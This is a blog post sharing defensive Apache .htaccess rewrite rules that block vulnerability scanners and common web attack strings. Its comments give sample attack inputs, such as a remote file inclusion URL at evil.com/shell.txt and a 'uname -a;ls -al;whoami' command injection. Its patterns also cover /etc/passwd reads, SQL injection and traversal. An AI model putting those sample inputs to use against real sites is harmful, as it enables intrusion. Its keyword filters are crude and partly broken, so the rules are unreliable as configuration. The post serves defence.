Hardened Apache Mod_Rewrite Security Rules (Via yehg.net)
At work, we deal with hacked sites a lot. Most of them are from FTP-based attacks, which we can’t do much to stop. However, some are legit app vulnerabilities, which we can do more to stop. The below .htaccess rules help with ALL apps, but might require some tweaking.
# Hardened Apache Mod_Rewrite Security Rule
# Provided by Aung Khant,http://yehg.net
# Last Updated: 2011-02-24
# Note: You must experiment which strings make access denied in normal clean traffic. Remove such rules. Contact me if you can't.
# Ref: http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html#rewritecond # NC = 'nocase|NC' (no case-sensitive)
# OR = 'ornext|OR' (or next condition)
# L = last rule RewriteEngine on
# Allow only GET and POST verbs
RewriteEngine On
# 'Coz most vul scanners use HEAD for hunting buggy files existence
RewriteCond %{REQUEST_METHOD} !^(GET|POST)$ [NC,OR]
# Ban Typical Vulnerability Scanners and others
RewriteCond %{HTTP_USER_AGENT} ^.*(0d0a|sqlmap|ApacheBench|WhatWeb|ZeW|SlimBrowser|drone|DataCha|SBIder|Shelob|MobileRunner|Microsoft\sOffice|Plesk|Itah|Mosill|Internet\sExplorer\s4\.01|al_viewer|NetSeer|MSFrontPage|Yandex|webcollage|lwp\-trivial|Isidorus|core\-project|\|Toata\sdragostea\smea\spentru\sdiavola|StackRambler|Firebat|Y\!J\-SRD|lynx|Netsparker|Nstalker|ZmEu|libwww|perl|java|curl|ruby|python|nikto|wikto|pikto|pykto|scan|acunetix|qualys|fuck|kiss|ass|Morfeus|0wn|hack|h4x|h4x0r|w3af).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(WWW\-Mechanize|revolt|wget|Crawl|Mail\.Ru|Walker|sbide|findlinks|spide|Ace\sExplorer|winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner).* [NC,OR]
# Kick out Script Kiddies
RewriteCond %{HTTP_USER_AGENT} ^()$ [NC,OR]
# void of UserAgent
# Disable access to cgi-bins if not used
RewriteCond %{REQUEST_URI} ^/(cgi\.cgi|webcgi|cgi\-914|cgi\-915|bin|cgi|mpcgi|cgi\-bin|ows\-bin|cgi\-sys|cgi\-local|htbin|cgibin|cgis|scripts|cgi\-win|fcgi\-bin|cgi\-exe|cgi\-home|cgi\-perl|scgi\-bin)/ [NC,OR]
# Block out common attack strings
# Additional filtering can be put into
# HTTP_USER_AGENT, HTTP_REFERER, HTTP_COOKIE,HTTP_FORWARDED,HTTP_ACCEPT
# Directory Travarsal, Null Byte Injection, HTTP Response Splitting
RewriteCond %{QUERY_STRING} ^.*(\.\./|\.\.%2f|\.\.%u2215|%u002e%u002e%u2215|%252e%252e%252f|%00|\\x00|\\u00|%5C00|%09|%0D%0A) [NC,OR]
# SQL Injection Probing
RewriteCond %{QUERY_STRING} ^.*(\@\@version|CHR\(|CHAR\(|UNION%20SELECT|/select/|/union/|/insert/|/update/|/delete/).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(or|and)%20([0-9]=[0-9]).* [NC,OR]
#Remote/Local File Inclusion
# RFI: yoursite.com/?pg=http://evil.com/shell.txt?
# LFI: yoursite.com/?pg=/logs/access_log?
RewriteCond %{QUERY_STRING} .*(=https|=http|=ftp)(://|%3a%2f%2f).*\?$ [NC,OR]
RewriteCond %{QUERY_STRING} (passwd|boot\.ini|\/etc\/passwd|%2Fetc%2Fpasswd|c:\\boot\.ini|c%3A\\boot\.ini|c:\/boot\.ini|c:%2Fboot\.ini|c%3A%2Fboot\.ini|c:boot\.ini|c%3Aboot\.ini).* [NC,OR]
# PHP Version Probing
RewriteCond %{QUERY_STRING} ^(=PHP).* [NC,OR]
# XSS Probing RewriteCond %{QUERY_STRING} ^.*(\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(/XSS/).* [NC,OR]
# PHP GLOBALS Overriding
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [NC,OR]
# PHP REQUEST variable Overriding
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [NC,OR]
# PHP Command Injection Probing
# vuln.php?exec=uname -a;ls -al;whoami
RewriteCond %{QUERY_STRING} ^.*(=|;)(uname%20-|ls%20-|whoami).*
# Deny access
RewriteRule ^(.*)$ / [R=404,F,L]
